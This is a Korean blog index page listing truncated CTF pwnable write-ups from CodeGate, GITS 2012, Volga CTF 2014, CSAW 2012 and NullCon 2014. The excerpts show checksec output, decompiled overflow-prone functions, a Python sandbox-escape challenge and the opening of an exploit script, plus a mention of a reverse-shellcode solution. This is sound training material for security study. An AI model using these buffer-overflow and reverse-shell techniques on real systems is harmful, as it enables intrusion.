CodeGate Junior 2014 [lotto]

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155# 2014.02.08 02:00:41 PSTimport timeimpor..
Pwnable/CTF 2015. 2. 15. 20:05
GITS2012 [Pwnable 200]

GITS 2012 Pwnable 200Pts 1234567891011~> file ./GITS2012_pwnable200 ./GITS2012_pwnable200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=c53d1dc1e47bd86dc63c9fba66f4a5c41cf2096d, stripped ~> checksec --file ./GITS2012_pwnable200 RELRO STACK CANARY NX PIE RPATH Partial RELRO No canary found NX disabled No PIE N..
Pwnable/CTF 2015. 1. 30. 19:28
Volga CTF 2014 [exploit 400]

푸는데 5시간 정도 걸린 문제. 분명 그렇게 오래 걸리면 안될 쉬운 문제인데삽질 + 불운 + 귀찮음 덕분에 굉장히 많이 걸렸다.. 123456789# file exploit400 exploit400: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x105e30fbeade2b06f9d82a9ff924871db71cae3c, stripped# checksec --file ./exploit400 RELRO STACK CANARY NX PIE RPATH No RELRO Canary found NX enabled No PI..
Pwnable/CTF 2015. 1. 30. 03:53
Volga CTF 2014 [exploit 300]

Volga CTF 2014 exploit300 12345678910111213141516171819202122232425# Location: /home/john/exploit300.py from sys import modulesmodules.clear()del modules _raw_input = raw_input_BaseException = BaseException_EOFError = EOFError # he-he__builtins__.__dict__.clear()__builtins__ = None print '>>> Just escape me...' while 1: try: d = { 'x' : None} exec 'x='+_raw_input()[:500] in d print 'ret:', d['x'..
Pwnable/CTF 2015. 1. 29. 22:12
Volga CTF 2014 [exploit 100]

이것 저것 해보다 보니 풀린 문제*password와 flag는 임의로 작성하였습니다. 1234567891011121314151617181920212223242526 while ( 1 ) { do { read(fd, &v14, 15u); LOBYTE(v17) = 0; } while ( strlen(&v14) != 12 ); v7 = 0; for ( i = 0; i
Pwnable/CTF 2015. 1. 28. 02:56
CSAW 2012 [Challenge1]

문제를 맞추는 게임을 제공함.첫번째 문제를 틀리면 두번째 기회가 주어지는데 그때 오버플로우가 일어남 12345678910111213141516171819202122232425262728293031323334int __cdecl vuln(int fd){ char buf_124; // [sp+14h] [bp-4B4h]@1 //size 124 char v3; // [sp+90h] [bp-438h]@4 char s2; // [sp+490h] [bp-38h]@4 int v5; // [sp+4B8h] [bp-10h]@1 int v6; // [sp+4BCh] [bp-Ch]@1 v6 = 0; v5 = 0; sques(fd, 1); v5 = recv(fd, &buf_124, 124u, 0); addn(&buf_124, ..
Pwnable/CTF 2015. 1. 23. 20:11
CodeGate 2014 [ Angry Doreamon ]

http://shell-storm.org/repo/CTF/CodeGate-2014/AngryDoraemon-250/ CodeGate 2014 문제를 다시 풀어봤다. Menu에서 4를 선택하면 나오는 MOUSE 부분에서 Overflow가 난다. 12345678910111213141516171819202122232425262728293031323334353637383940int __cdecl sub_8048FC6(int fd){ int v1; // edx@3 int v2; // ecx@3 int v3; // eax@4 size_t v4; // ST1C_4@4 int result; // eax@5 int v6; // [sp+18h] [bp-20h]@1 int buf; // [sp+22h] [bp-16h]@1 ..
Pwnable/CTF 2015. 1. 14. 04:58
NullCon 2014 [Exploitation 100]

JMP ESP 쓰면 됨. 내 서버가 없어서 친구서버 빌려 Reverse Shellcode를 통하여 품. 123080483dc : 80483dc: 8d 7f 06 lea 0x6(%edi),%edi 80483df: ff e7 jmp *%edics 1234567891011121314151617181920212223242526272829303132333435363738#!/usr/bin/env python#-*-coding:utf8-*-from socket import *from struct import * p = lambda x : pack("
Pwnable/CTF 2015. 1. 13. 20:31
1 2 3 4
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
TAG
more
«   2024/11   »
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
글 보관함